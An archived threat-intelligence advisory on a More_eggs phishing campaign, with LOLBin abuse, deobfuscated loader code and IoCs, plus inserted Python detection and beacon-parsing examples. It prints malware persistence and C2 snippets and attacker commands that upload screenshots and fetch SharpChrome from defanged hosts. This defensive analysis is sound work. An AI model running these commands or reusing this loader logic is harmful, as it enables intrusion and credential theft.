{
	"id": "3c070982-0937-4a5d-b475-5c59ce914f6b",
	"created_at": "2026-04-06T00:14:44.618281Z",
	"updated_at": "2026-04-10T03:36:08.283959Z",
	"deleted_at": null,
	"sha1_hash": "0795455275faf6b5dfed815cbd61d40a6cd88595",
	"title": "Securonix Threat Labs Security Advisory: New OCX#HARVESTER Attack Campaign Leverages Modernized More_eggs Suite to Target Victims",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 10146549,
	"plain_text": "Securonix Threat Labs Security Advisory: New OCX#HARVESTER Attack Campaign Leverages Modernized More_eggs Suite to Target Victims\r\nArchived: 2026-04-05 21:35:50 UTC\r\nBy Securonix Threat Labs, Threat Research: Den Iuzvyk, Tim Peck, Oleg Kolesnikov\r\nTL;DR\r\nThe Securonix Threat Research team (STR) has recently observed a new attack campaign tracked by Securonix as OCX#HARVESTER. Some of the malicious payloads leveraged in the campaign appear to be related to the More_eggs payloads reported earlier [1]. The naming of some of the collected samples, as well as some of the lure images, suggests that the targets in this campaign are directly or indirectly related to the financial sector, especially those involved in cryptocurrencies.\r\nThe payloads in this attack campaign were observed by STR in the wild mostly between December 2022 and March of this year. Multiple victims were targeted and exploited by the attackers as part of the campaign.\r\nSome of our observations about this attack campaign and possible ways to detect it are described below. It is likely that the attacks continue at this point, with new targets and malware delivery methods. We also observed that C2 communication has shifted to new infrastructure, which we dive into further down.\r\nAttack chain overview\r\nAs with most external attacks, phishing emails carrying a malicious zip attachment appear to be the primary delivery method. The attachment analyzed by our team (screenshots-9201.jpg.zip) contains two shortcut files, “Screenshot-9501.JPG.lnk” and “Screenshot-9502.JPG.lnk”, disguised as JPEG images. This particular lure method is quite common and was recently seen during the PY#RATION attack campaign discovered earlier this year. 
\r\nDiving a bit deeper into the initial code execution from the two LNK files, we can see that each shortcut links to “C:\\Windows\\System32\\cmd.exe” along with a large chunk of obfuscated command line.\r\n.LNK file execution\r\nThe two image lures take the appearance of a generic image icon, pulled from the “Windows Image Resource” file (imageres.dll), which contains a library of icons for files and folders.\r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/\r\nPage 1 of 21\n\nFigure 1: [OCX#HARVESTER] Shortcut .lnk file lure (Screenshot-9502.JPG.lnk)\r\nTaking a closer look at the two .lnk files, there is obvious CMD obfuscation passed as command line parameters along with the call to cmd.exe, as seen in the figure below.\r\nFigure 2: [OCX#HARVESTER] Shortcut .lnk file analysis\r\nThe obfuscated command line performs a couple of functions which set the stage for binary proxy execution. This is done using a common LOLBin technique which leverages the Windows binary ie4uinit.exe. First, it copies that file to the %TMP% directory. Next, it creates a file in the same directory called ieuinit.inf. Most of the command line is populating that file with the parameters needed to execute the next stage of the attack.\r\nFigure 3: [OCX#HARVESTER] Staging the Ie4uinit.exe LOLBin\r\nLOLBin usage: ie4uinit.exe\r\nIn summary, the ie4uinit.exe LOLBin attack works by copying the ie4uinit.exe executable out of the C:\\Windows\\System32\\ directory and placing it into a writable directory chosen by the attacker, in this case the user’s %TMP% directory. By default this is typically C:\\Users\\<user>\\AppData\\Local\\Temp\\. 
\r\nOnce copied, a new file named ieuinit.inf is created in the same directory. For the attack to work, this file contains a directive which calls a section named “DefaultInstall.Windows7”. That section in turn points at the [F07FD] section, which is where we find the reference to the scrobj.dll/SCT payload (robots.php in our case).\r\nFigure 4: [OCX#HARVESTER] – deobfuscated ieuinit.inf file\r\nThe next step is to execute the moved (or in some cases moved and renamed) ie4uinit.exe binary with the required command line. In our case, START /MIN was utilized along with wmic process call create:\r\nstart /MIN wmic process call create \"%tmp%\\ie4uinit.exe -basesettings\"\r\nWhen the above command is executed, ie4uinit.exe reads the contents of the ieuinit.inf file sitting next to it. The referenced scrobj.dll/SCT payload is downloaded and any embedded scripts are executed on the system.\r\nLet’s next examine the contents of the robots.php file, which takes us into the second stage of the attack.\r\nRobots.php (SCT)\r\nAt this stage of the attack the attackers have achieved code execution and are looking to advance their foothold. This is historically where TerraLoader comes into play within the More_eggs attack chain. Similar to what has been observed in the past, TerraLoader is a heavily obfuscated JavaScript loader which provides command and control (C2) functionality on the affected host.\r\nFigure 5: [OCX#HARVESTER] – robots.php obfuscation example\r\nIn this particular sample, the level of obfuscation is pretty extreme. As seen in the figure above, the script is full of character substitution, randomly generated variable names and broken-apart strings. 
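The ieuinit.inf hand-off described above (DefaultInstall.Windows7 pointing at the [F07FD] section that names scrobj.dll and the robots.php scriptlet) is easy to triage from a disk image. The Python below is an added example and not code from this advisory or from the malware: it parses an INF, follows the RegisterOCXs/UnRegisterOCXs directive to the section it names, and returns the scriptlet URL that ie4uinit.exe -BaseSettings would fetch. The sample INF is constructed for the example; its section and file names come from this advisory and its remaining layout is modelled on the LOLBAS ie4uinit.exe entry [3], so treat that layout as an assumption rather than a copy of the real dropper.

```python
import re

BS = chr(92)  # a single backslash, built at runtime so this listing contains no escape sequences


def parse_inf(text):
    # Minimal INF reader: [Section] headers, one entry per line, ';' starts a comment.
    # Section names are case-insensitive, so they are lower-cased for lookup.
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split(';', 1)[0].strip()
        if not line:
            continue
        header = re.match(r'^[[](.+)[]]$', line)
        if header:
            current = header.group(1).strip().lower()
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def scriptlet_urls(inf_text):
    # Follow the chain ie4uinit.exe -BaseSettings walks: DefaultInstall.Windows7 names a
    # RegisterOCXs/UnRegisterOCXs section whose entries look like <dll>,<flags>,<argument>.
    # For scrobj.dll the argument is the URL of the SCT scriptlet that gets fetched and run.
    sections = parse_inf(inf_text)
    targets = []
    for entry in sections.get('defaultinstall.windows7', []):
        key, _, value = entry.partition('=')
        if key.strip().lower() in ('registerocxs', 'unregisterocxs'):
            targets += [v.strip().lower() for v in value.split(',') if v.strip()]
    found = []
    for name in targets:
        for entry in sections.get(name, []):
            fields = [f.strip() for f in entry.split(',')]
            if len(fields) >= 3 and fields[0].lower().endswith(BS + 'scrobj.dll'):
                found.append((name, fields[-1]))
    return found


def triage(inf_text):
    # Just the URLs: a non-empty list is the indicator to block and hunt for.
    return [url for _, url in scriptlet_urls(inf_text)]


# Constructed sample (not the real dropper's file): section and payload names come from this
# advisory, the rest of the layout is assumed from the LOLBAS ie4uinit entry. URL is defanged.
SAMPLE_INF = chr(10).join([
    '[Version]',
    'Signature=$Chicago$',
    '',
    '[DefaultInstall.Windows7]',
    'UnRegisterOCXs=F07FD   ; hand-off to the section holding the scrobj.dll entry',
    '',
    '[F07FD]',
    '%11%' + BS + 'scrobj.dll,NI,hxxp://95.179.201[.]171/robots.php   ; %11% = System32',
])

if __name__ == '__main__':
    for url in triage(SAMPLE_INF):
        print('SCT payload referenced by ieuinit.inf:', url)
```

Run it against the ieuinit.inf found beside a relocated ie4uinit.exe; the result gives you the URL to block and hunt for in proxy logs, and the section name the obfuscated LNK command line was assembling.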
\r\nAfter deobfuscating the script, we’re able to better understand its capabilities. Some of these include:\r\nPersistence: establish a registry foothold (a logon script value that runs at every user logon):\r\nActXobj1.RegWrite(\"HKCU\\\\Environment\\\\UserInitMprLogonScript\", 'cscript /b /e:jscript \"%APPDATA%\\\\Microsoft\\\\' + PersFileName + '\"');\r\nEstablish a connection to the C2 server:\r\nConnectionLite.open(\"GET\", \"hxxp://95.179.186[.]167/Writer.php?deploy=\" + CommandToRun, false);\r\nCommand execution using msxsl.exe:\r\nCommandToRun = 'cmd /c start /min \"\" \"' + MsxslPath + '\" \"' + DropperPath + LoaderFileName + '\"' + ' \"' + DropperPath + LoaderFileName + '\"';\r\nThe loader script then shifts gears and starts to stage inside the %APPDATA%\\Microsoft\\ directory. Two new files are created: “ZUW0Y1NVRZ6LIIHFO2AQNHTX.txt” and “QVB3WZXVQG6G8O7V.txt”. Each of these files serves a distinct purpose, and both once again contain heavily obfuscated JavaScript code.\r\nvar DropperPath = WScriptShell.ExpandEnvironmentStrings(\"%appdata%\");\r\nDropperPath = DropperPath + \"\\\\Microsoft\\\\\";\r\nvar LoaderFileName = \"ZUW0Y1NVRZ6LIIHFO2AQNHTX.txt\";\r\nvar PersFileName = \"QVB3WZXVQG6G8O7V.txt\";\r\nvar MsxslPath = DropperPath + gVKMduVwicY669(KngnfjMhu502, JYUyEnBGkSSrXUy905);\r\nLOLBin usage: msxsl.exe\r\nTo execute further stagers and maintain persistence, the Microsoft-signed command-line XSL transformer msxsl.exe is used to ensure script execution success. This particular LOLBin allows the code to bypass application whitelisting restrictions such as AppLocker. 
Code such as JScript or VBScript embedded in what msxsl.exe expects to be an .xsl stylesheet (or any XML-formatted file) can be executed regardless of application restrictions.\r\nSimilar to the previous LOLBin example using ie4uinit.exe, msxsl.exe is executed from the attacker-controlled directory %APPDATA%\\Microsoft\\.\r\nBy default, msxsl.exe does not exist on most Windows installations. However, since the binary is extremely lightweight, the entire msxsl.exe executable is written to disk from raw hex values embedded inside the robots.php script.\r\nFigure 6: [OCX#HARVESTER] – building the msxsl.exe binary from JavaScript (deobfuscated)\r\nThe written msxsl.exe binary, a mere 24KB, appears to pass integrity checks and carries a Microsoft Corporation digital signature, so publisher-based allow-listing rules do not stop it. This file, along with “ZUW0Y1NVRZ6LIIHFO2AQNHTX.txt” and “QVB3WZXVQG6G8O7V.txt”, is written to disk upon execution of robots.php.\r\nFigure 7: [OCX#HARVESTER] – initial compromise infection process tree\r\nFigure 8: [OCX#HARVESTER] – built msxsl.exe binary details\r\nAs you’ll see, this LOLBin technique is used quite often in the next stage of the attack.\r\nJScript Execution (ZUW0Y1NVRZ6LIIHFO2AQNHTX.txt)\r\nThis phase of the attack is kicked off by robots.php using the following command:\r\nmsxsl.exe \"C:\\Users\\redacted\\AppData\\Roaming\\Microsoft\\ZUW0Y1NVRZ6LIIHFO2AQNHTX.txt\" \"C:\\Users\\redacted\\AppData\\Roaming\\Microsoft\\ZUW0Y1NVRZ6LIIHFO2AQNHTX.txt\"\r\nmsxsl.exe takes an XML source document followed by an XSL stylesheet; here the same .txt file is passed as both, so the file is a valid XML document carrying the script block.\r\nThis file, following the current trend, is also heavily obfuscated in an attempt to circumvent detection engines. 
The obfuscation methods in this particular file are very similar to what we saw in robots.php.\r\nTaking the time to deobfuscate the file gives us some insight into this stager’s capabilities.\r\nCommand and Control [T1071.001]\r\nC2 communication is established by creating a new ActiveXObject and one of several XMLHTTP objects to conn

ect to the attacker’s remote server. In this particular sample we observed the following URLs being used:\r\nhxxps://telemistry[.]net/reg.php?g=\r\nhxxps://telemistry[.]net/get.php?g=\r\nConnections are made with a GET request that carries some general host information such as user name, computer name, and domain.\r\nFigure 9: [OCX#HARVESTER] – ZUW0Y1NVRZ6LIIHFO2AQNHTX.txt: C2 connection strings\r\nExecution using WMI [T1047]\r\nCommands and other processes can also be executed through the Windows Management Instrumentation (WMI) infrastructure.\r\nFigure 10: [OCX#HARVESTER] – ZUW0Y1NVRZ6LIIHFO2AQNHTX.txt: WMI command execution\r\nLong sleeps [T1497.003]\r\nIn an effort to evade heuristic detection and as an anti-debugging measure, malware may incorporate long sleep times in several or all of its functions. 
This strain uses a separate function which executes the following command:\r\ntypeperf.exe \"\\System\\Processor Queue Length\" -si {sleep time in seconds} -sc 1\r\ntypeperf collects one sample (-sc 1) after waiting the given interval (-si), so the call blocks for the requested number of seconds without the script ever calling a sleep API itself. The usage of this particular trick was seen with previous versions of TerraLoader as well.\r\nFigure 11: [OCX#HARVESTER] – ZUW0Y1NVRZ6LIIHFO2AQNHTX.txt: typeperf.exe execution\r\nThe function calling the command is leveraged heavily in the next section.\r\nMsxsl.exe execution [T1220]\r\nIn another effort to maintain persistence on the host, the script leverages the msxsl.exe LOLBin to re-run this same script file and then sleeps (using the typeperf.exe method) for 120 seconds, in a loop. This ensures that C2 communication is re-established after internet disconnects or application crashes.\r\nAdditional functionality\r\nIn addition to the more prominent features discussed, the script contains functionality such as:\r\nFile read\r\nFile write\r\nExecute command (using WScript.Shell)\r\nAV enumeration\r\nJS execution (QVB3WZXVQG6G8O7V.txt)\r\nThis script is primarily for maintaining persistence on the host. If you recall, it is referenced by the registry modification “HKCU\\Environment\\UserInitMprLogonScript”. Like every other file we’ve analyzed it is also heavily obfuscated; however, once translated into something human-readable it makes a bit more sense (Figure 12).\r\nFigure 12: [OCX#HARVESTER] – QVB3WZXVQG6G8O7V.txt: deobfuscated\r\nThis simple script leverages “WScript.Shell” to run the msxsl.exe LOLBin against the main script, ZUW0Y1NVRZ6LIIHFO2AQNHTX.txt, so the backdoor is relaunched at every user logon.\r\nOCX#HARVESTER (DLL) binary file analysis\r\nThe next stage of the attack kicks off by downloading and executing a few different OCX#HARVESTER files. 
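The behaviours laid out in the sections above (ie4uinit.exe running from a copied location, wmic process call create as the launcher, msxsl.exe executing from %APPDATA%, typeperf.exe as a sleep primitive), plus the curl image upload covered in the DLL analysis that follows, all show up in process-creation telemetry. The Python below is an added example, not code from this advisory or from Securonix: it encodes each condition as a rule and runs the set over a few constructed Sysmon-style events. The event field names (id, image, command_line) and the event contents are assumptions built for the example, including the placeholder host c2.invalid.

```python
BS = chr(92)  # backslash, built at runtime so the listing has no escape sequences

SYSTEM_DIRS = ('c:/windows/system32/', 'c:/windows/syswow64/')
USER_WRITABLE = ('/appdata/local/', '/appdata/roaming/', '/programdata/', '/users/public/')


def win(path):
    # Turn a forward-slash path into a Windows one (used only to build the constructed events).
    return path.replace('/', BS)


def norm(path):
    # Forward slashes and lower case so every rule can match one spelling.
    return path.replace(BS, '/').lower()


def rule_ie4uinit_relocated(ev):
    # ie4uinit.exe copied out of System32/SysWOW64 and run from a user-chosen directory
    img = norm(ev['image'])
    return img.endswith('/ie4uinit.exe') and not img.startswith(SYSTEM_DIRS)


def rule_wmic_process_create(ev):
    # 'wmic process call create ...' used as the launcher (extra whitespace collapsed first)
    words = ' '.join(ev['command_line'].lower().split())
    return norm(ev['image']).endswith('/wmic.exe') and 'process call create' in words


def rule_msxsl_user_dir(ev):
    # msxsl.exe (dropped by robots.php) executing from %APPDATA%, %PROGRAMDATA% or Users/Public
    img = norm(ev['image'])
    return img.endswith('/msxsl.exe') and any(d in img for d in USER_WRITABLE)


def rule_typeperf_sleep(ev):
    # typeperf sampling 'Processor Queue Length' once after a long interval: a sleep primitive
    cl = ev['command_line'].lower()
    return (norm(ev['image']).endswith('/typeperf.exe')
            and 'processor queue length' in cl and ' -si ' in cl and ' -sc ' in cl)


def rule_curl_image_transfer(ev):
    # curl/wget moving image files over HTTP(S), as with the desktop capture sent to sas.php
    cl = ev['command_line'].lower()
    return (norm(ev['image']).endswith(('/curl.exe', '/wget.exe'))
            and ('http://' in cl or 'https://' in cl)
            and any(ext in cl for ext in ('.jpg', '.jpeg', '.png')))


RULES = {
    'ie4uinit_relocated': rule_ie4uinit_relocated,
    'wmic_process_create': rule_wmic_process_create,
    'msxsl_user_dir': rule_msxsl_user_dir,
    'typeperf_sleep': rule_typeperf_sleep,
    'curl_image_transfer': rule_curl_image_transfer,
}


def evaluate(events):
    # Returns (event id, rule name) for every rule that fires, in event order.
    return [(ev['id'], name) for ev in events for name, rule in RULES.items() if rule(ev)]


# Constructed process-creation events (field names are assumptions, not a real Sysmon schema).
# Events 1-5 mirror the chain in this advisory; 6 and 7 are benign look-alikes that must not fire.
SAMPLE_EVENTS = [
    {'id': 1, 'image': win('C:/Users/alice/AppData/Local/Temp/ie4uinit.exe'),
     'command_line': 'ie4uinit.exe -basesettings'},
    {'id': 2, 'image': win('C:/Windows/System32/wbem/WMIC.exe'),
     'command_line': 'wmic  process call create ' + win('%tmp%/ie4uinit.exe') + ' -basesettings'},
    {'id': 3, 'image': win('C:/Users/alice/AppData/Roaming/Microsoft/msxsl.exe'),
     'command_line': 'msxsl.exe ZUW0Y1NVRZ6LIIHFO2AQNHTX.txt ZUW0Y1NVRZ6LIIHFO2AQNHTX.txt'},
    {'id': 4, 'image': win('C:/Windows/System32/typeperf.exe'),
     'command_line': 'typeperf.exe ' + win('/System/Processor Queue Length') + ' -si 120 -sc 1'},
    {'id': 5, 'image': win('C:/Windows/System32/curl.exe'),
     'command_line': 'curl -f image=@c:' + win('/programdata/test.png') + ' http://c2.invalid/sas.php?name=HOST'},
    {'id': 6, 'image': win('C:/Windows/System32/ie4uinit.exe'),
     'command_line': 'ie4uinit.exe -ClearIconCache'},
    {'id': 7, 'image': win('C:/Windows/System32/typeperf.exe'),
     'command_line': 'typeperf.exe ' + win('/Processor(_Total)/% Processor Time') + ' -sc 3'},
]

if __name__ == '__main__':
    for event_id, rule_name in evaluate(SAMPLE_EVENTS):
        print(event_id, rule_name)
```

Events 6 and 7 are benign look-alikes (ie4uinit.exe from System32, typeperf without -si) and are there to show the rules stay quiet on normal use; in production the same predicates map onto the Image and CommandLine fields of Sysmon Event ID 1.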
The OCX#HARVESTER DLLs are placed in different directories around the system after being downloaded with curl; regsvr32.exe is then used to register (and so execute) each DLL payload.\r\nWe learn a couple of things simply by examining the program database (PDB) path referenced in each of the OCX#HARVESTER files. First, they were compiled under a user account named “David”; that doesn’t tell us much on its own, but it strengthens the case that they were all compiled by the same person. The folder structure is that of a Visual Studio project, and each was compiled for a 64-bit CPU architecture.\r\nReferenced PDB File: C:\\Users\\David\\source\\repos\\Rev\\x64\\Release\\Rev.pdb\r\nCamera.OCX#HARVESTER\r\nThis binary was by far the smallest at only 177KB. Its purpose appears to be quite simple: it captures images of the user’s desktop.\r\nFigure 13: [OCX#HARVESTER] – camera.OCX#HARVESTER PE info\r\nOnce captured, the image is saved to “C:\\ProgramData\\test.png” and uploaded to the attacker’s C2 server using curl. In our case we observed the following command:\r\n\"c:\\windows\\system32\\cmd.exe\" /v /c \"curl -f \"image=@c:\\programdata\\test.png\" hxxp://193.149.185[.]229/sas.php?name=REDACTED_HOSTNAME\"\r\nNotice that the victim machine’s hostname is appended to the “name” PHP parameter.\r\nFigure 14: [OCX#HARVESTER] – camera.OCX#HARVESTER supporting debug data\r\nFoonet.OCX#HARVESTER and bonet.OCX#HARVESTER\r\nThe binaries Foonet.OCX#HARVESTER and bonet.OCX#HARVESTER were also identified as 64-bit PE executables masquerading as DLL files. Similar to the others, they were compiled in C++ using Visual Studio. 
Both had identical file sizes and produced similar data when analyzed.\r\nFigure 15: [OCX#HARVESTER] – Foonet.OCX#HARVESTER PE info\r\nThe purpose of these binaries is largely unknown. We did, however, observe them making an external connection to 193.149.185[.]229 over port 1437. The binary itself is heavily obfuscated, making analysis difficult; however, based on high-level analysis of Foonet.OCX#HARVESTER, we were able to confirm the presence of the hard-coded IP and port.\r\nFigure 16: [OCX#HARVESTER] – Foonet.OCX#HARVESTER supporting debug data: C2 IP/Port\r\nTunner.OCX#HARVESTER\r\nThis particular OCX#HARVESTER file was downloaded by the attackers but remained mostly unused; aside from the web request record “hxxp://193.149.187[.]170/webdav/Tunner.OCX#HARVESTER” there was no indication of it being leveraged during any stage of the attack.\r\nThe file, whose original name is “MathATL.dll”, is also small at 271KB and features counter-analysis and anti-debugging characteristics.\r\nFigure 17: [OCX#HARVESTER] – Tunner.OCX#HARVESTER PE info\r\nThings got a bit more interesting after analyzing the file more deeply. Hidden inside is a large XOR-encoded block. Further analysis revealed that this file is likely a Cobalt Strike beacon which checks in to “ukmedia[.]store/static-directory/html.mp3”, a directory structure and file extension commonly seen with Cobalt Strike Arsenal payloads.\r\nThe user agent found in the shellcode is the one commonly seen in default Cobalt Strike payloads, which the attackers never bothered changing. 
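One way to pull the beacon settings out of a sample like Tunner.OCX#HARVESTER once you suspect an XOR-encoded block, as an added example that is not code from this advisory: stock Cobalt Strike beacons store their configuration XOR-ed with a single byte (0x2e for 4.x, 0x69 for 3.x) as a list of big-endian TLV records beginning with the BeaconType entry, and that layout is what the scanner below assumes. The blob it runs on is constructed for the example; it is seeded with the ukmedia[.]store path and the Android Chrome user agent quoted in this advisory, not with bytes from the actual sample, and the other values (port, sleep, jitter, POST URI) are made up.

```python
import struct

# Layout assumed here (standard Cobalt Strike beacon config, not bytes from the sample):
# the config is XOR-ed with one byte (0x2e on 4.x, 0x69 on 3.x) and is a list of
# TLV records: uint16 index, uint16 type, uint16 length, value (all big-endian).
XOR_KEYS = (0x2e, 0x69)
TYPE_SHORT, TYPE_INT, TYPE_BYTES = 1, 2, 3
MARKER = struct.pack('>HHH', 1, TYPE_SHORT, 2)  # record 1 (BeaconType) always opens the config
NAMES = {1: 'beacon_type', 2: 'port', 3: 'sleep_ms', 4: 'max_get_size', 5: 'jitter',
         8: 'c2_server', 9: 'user_agent', 10: 'http_post_uri'}


def xor(data, key):
    return bytes(b ^ key for b in data)


def find_config(blob):
    # Locate the encoded marker under each candidate key; returns (key, offset) or None.
    for key in XOR_KEYS:
        off = blob.find(xor(MARKER, key))
        if off != -1:
            return key, off
    return None


def parse_settings(config):
    # Walk TLV records until the terminating index 0 (or the end of the buffer).
    settings, pos = {}, 0
    while pos + 6 <= len(config):
        idx, typ, length = struct.unpack('>HHH', config[pos:pos + 6])
        pos += 6
        if idx == 0 or pos + length > len(config):
            break
        raw = config[pos:pos + length]
        pos += length
        if typ == TYPE_SHORT and length == 2:
            value = struct.unpack('>H', raw)[0]
        elif typ == TYPE_INT and length == 4:
            value = struct.unpack('>I', raw)[0]
        else:
            value = raw.rstrip(bytes(1)).decode('latin-1')  # strip NUL padding
        settings[NAMES.get(idx, idx)] = value
    return settings


def extract_beacon_config(blob, max_len=4096):
    # Scan the whole blob (DLL, memory dump or carved shellcode) rather than a fixed offset.
    hit = find_config(blob)
    if hit is None:
        return None
    key, off = hit
    return parse_settings(xor(blob[off:off + max_len], key))


# --- constructed sample, built from this page's indicators rather than the real shellcode ---
def tlv(idx, typ, value, width=0):
    if typ == TYPE_SHORT:
        body = struct.pack('>H', value)
    elif typ == TYPE_INT:
        body = struct.pack('>I', value)
    else:
        body = value.encode('latin-1').ljust(width, bytes(1))  # fixed-width, NUL padded
    return struct.pack('>HHH', idx, typ, len(body)) + body


UA = ('Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 '
      '(KHTML, like Gecko) Chrome/62.0.3202')
SAMPLE_CONFIG = (tlv(1, TYPE_SHORT, 8) + tlv(2, TYPE_SHORT, 443) + tlv(3, TYPE_INT, 60000)
                 + tlv(5, TYPE_SHORT, 20)
                 + tlv(8, TYPE_BYTES, 'ukmedia.store,/static-directory/html.mp3', 256)
                 + tlv(9, TYPE_BYTES, UA, 128)
                 + tlv(10, TYPE_BYTES, '/submit.php', 64)
                 + struct.pack('>HHH', 0, 0, 0))
FILLER = bytes((37 * i + 11) % 256 for i in range(512))  # stand-in for surrounding shellcode
SAMPLE_BLOB = FILLER + xor(SAMPLE_CONFIG, 0x2e) + FILLER

if __name__ == '__main__':
    for k, v in (extract_beacon_config(SAMPLE_BLOB) or {}).items():
        print(k, v)
```

Scanning for the encoded marker instead of a fixed offset means the routine works on the raw DLL, on a memory dump or on extracted shellcode; the returned c2_server value is the host,URI pair the beacon checks in to, which is the indicator to block.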
The user agent string embedded in the shellcode is: “Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202”\r\nFigure 18: [OCX#HARVESTER] – Tunner.OCX#HARVESTER Cobalt Strike implant shellcode\r\nC2 and infrastructure\r\nThe following IP addresses and domains were observed as part of the overall C2 infrastructure during the OCX#HARVESTER campaign.\r\nIP address          Description\r\n95.179.201[.]171    Hosts robots.php\r\n95.179.180[.]224    Hosts robots.php\r\n172.86.75[.]75      Hosts robots.php\r\n95.179.186[.]167    C2: /Writer.php\r\n95.179.170[.]76     C2: telemistry[.]net/get.php?id=xxxxxxx\r\n193.149.187[.]170   Hosts Tunner.OCX#HARVESTER\r\n193.149.185[.]229   C2 implant: port 1437\r\nFull URLs\r\nhxxp://95.179.201[.]171/robots.php\r\nhxxp://95.179.180[.]224/robots.php\r\nhxxp://172.86.75[.]75/robots.php\r\nhxxp://95.179.186[.]167/Writer.php\r\nhxxp://193.149.185[.]229/sas.php\r\nukmedia[.]store/static-directory/html.mp3\r\nhxxp://193.149.185[.]229/api/SharpChrome.exe\r\nDNS activity\r\ntelemistry[.]net (95.179.170[.]76)\r\nukmedia[.]store\r\nwindowsupdatebg.s.llnwi[.]net (a legitimate Windows Update CDN hostname, listed as observed DNS activity only; do not treat it as an indicator on its own)\r\nSome observations regarding potential attribution\r\nHistorically, several MaaS customers have been sighted utilizing Golden Chickens. Probably the most famous of these is FIN6, which since 2018 has primarily targeted the financial sector. Others include the Cobalt Group from Russia and Evilnum out of Belarus.\r\nThe campaign which we observed starting in January this year began with a sample that originated from Turkey (36bf06bde63af8cdd673444edf64a323195fe962b3256e0269cdd7a89a7e2ae1).\r\nThe modus operandi of the More_eggs malware suite tracks with past activity seen historically. 
Some commonalities between prior versions and the latest include:\r\nObfuscated CMD in .lnk file using image lures\r\nStaging directory in %APPDATA%\\Microsoft\\\r\nie4uinit.exe LOLBin\r\nmsxsl.exe LOLBin\r\nPersistence through the registry value HKCU\\Environment\\UserInitMprLogonScript\r\nObfuscated JavaScript loader\r\nObfuscated JavaScript backdoor\r\nSimilar obfuscation techniques\r\nOCX#HARVESTER file execution through regsvr32.exe\r\nPost exploitation analysis and observations\r\nAfter gaining full access, the attackers attempted to download and run SharpChrome.exe from one of their C2 servers. The file was downloaded into the %APPDATA%\\Adobe\\ directory and saved as BTaker.exe.\r\nSharpChrome is the Chrome-specific build of SharpDPAPI [5], designed to decrypt and extract Chrome cookies and saved logins through the user’s DPAPI keys.\r\nWe observed the attackers execute the following commands during the campaign:\r\nExecuted Commands\r\ndier (typo)\r\ndir\r\ntype update.js\r\ntype kohl.js\r\nnet user\r\nnet user /domain\r\ncmd /v /c \"curl hxxp://193.149.185[.]229/api/SharpChrome.exe -o %appdata%\\Adobe\\BTaker.exe \u0026\u0026 cd %appdata%\\Adobe \u0026\u0026 BTaker.exe\"\r\ncd %appdata%\r\ncmd\r\nConclusion\r\nBased on what we observed as part of the OCX#HARVESTER attack campaign, it’s apparent that the More_eggs suite of malware used in the campaign is still being actively maintained and retooled in an attempt to circumvent detections. The Securonix Threat Research team will continue to monitor for changes and new attack vectors associated with the attack campaign and the malware suite. Updates will be provided as needed.\r\nSecuronix recommendations and mitigations\r\nAvoid opening any attachments, especially those that are unexpected or come from outside the organization. 
Be extra vigilant with .zip, .iso, and .img attachments.\r\nImplement an application whitelisting policy to restrict the execution of unknown binaries. Note that a publisher-only rule lets through the Microsoft-signed msxsl.exe this campaign drops, so pair it with path rules that block executables running from %TMP%, %APPDATA% and %PROGRAMDATA%.\r\nDeploy additional process-level logging such as Sysmon and PowerShell logging for additional detection coverage.\r\nSecuronix customers can scan endpoints using the Securonix Seeder Hunting Queries below.\r\nMITRE ATT\u0026CK Matrix\r\nTactic                Technique\r\nInitial Access        T1566: Phishing\r\n                      T1566.001: Phishing: Spearphishing Attachment\r\nExecution             T1204.002: User Execution: Malicious File\r\n                      T1059.001: Command and Scripting Interpreter: PowerShell\r\n                      T1059.003: Command and Scripting Interpreter: Windows Command Shell\r\n                      T1059.007: Command and Scripting Interpreter: JavaScript\r\n                      T1204.001: User Execution: Malicious Link\r\nDefense Evasion       T1218.005: System Binary Proxy Execution: Mshta\r\n                      T1218.010: System Binary Proxy Execution: Regsvr32\r\n                      T1220: XSL Script Processing\r\nPersistence           T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder\r\nCommand and Control   T1573.001: Encrypted Channel: Symmetric Cryptography\r\n                      T1071.001: Application Layer Protocol: Web Protocols\r\n                      T1105: Ingress Tool Transfer\r\n                      T1571: Non-Standard Port\r\nExfiltration          T1041: Exfiltration Over C2 Channel\r\nAnalyzed file hashes\r\nFile Name                                  SHA256 (IoC)\r\nscreenshots-9201.jpg.zip                   36bf06bde63af8cdd673444edf64a323195fe962b3256e0269cdd7a89a7e2ae1\r\nAxiance_Full_Reports.zip                   
631f92c9147733acf3faa02586cd2a6cda673ec83c24252fccda1982cf3e96f6\r\nScreenshot-9501.JPG.lnk                    d496394abba570aa86abb4238cfa03762e3ccdb5c14920e3669ec2c1bb06321b\r\n                                           36bf06bde63af8cdd673444edf64a323195fe962b3256e0269cdd7a89a7e2ae1\r\nScreenshot-9502.JPG.lnk                    13140291db39218c897d2ff960c1ef4ec3107bd239bc04ba8a218ad3b4dbd72f\r\n                                           4ba964764210607f3bab884a14afa0b917891cff969a309bbbc12d3321386352\r\nScreenshot_0459159441.lnk                  bfe048ba91218019b64ab8477dad3ba6033cbc584f0d751d2866023b2b546c2e\r\nAxiance_FullReport_Volume.png.lnk          d95e19341fa4af9a405f3a34fc3788dd9b74a9d6ab0f5cbe63cca5271ce63e05\r\nieuinit.inf                                7ac84bf51b9db169b1282bb40daae2d38bb2fa5acc02b590198815a79cee1dbf\r\n                                           47e5232576e2eed33a13bca998c93e7aee57711f588b17f75367f7e58ea09ad9\r\n                                           494839430932a97030a7163d636d2365d715ff517ba912f2afd0c557494d077a\r\nMathATL.dll                                debead9e8e3d106991e38d2057931265b3a08d4746c08255df0a4bf986327215\r\nrobots.php                                 7358d711f27086a21ce7485b1f1a570f0556f2c4096e22cac94a4b5d86842194\r\nBonet.OCX#HARVESTER                        1e8c661f7496120d66aaca02def8c670f1bd656f0e9f4aefb5991bf214a48ffc\r\nCamera.OCX#HARVESTER (tollscamera.OCX#HARVESTER)  1c9cd406024034cd69ac881801085b21864ec4148dd9cab6498cbd7ca77408bc\r\nFoonet.OCX#HARVESTER                       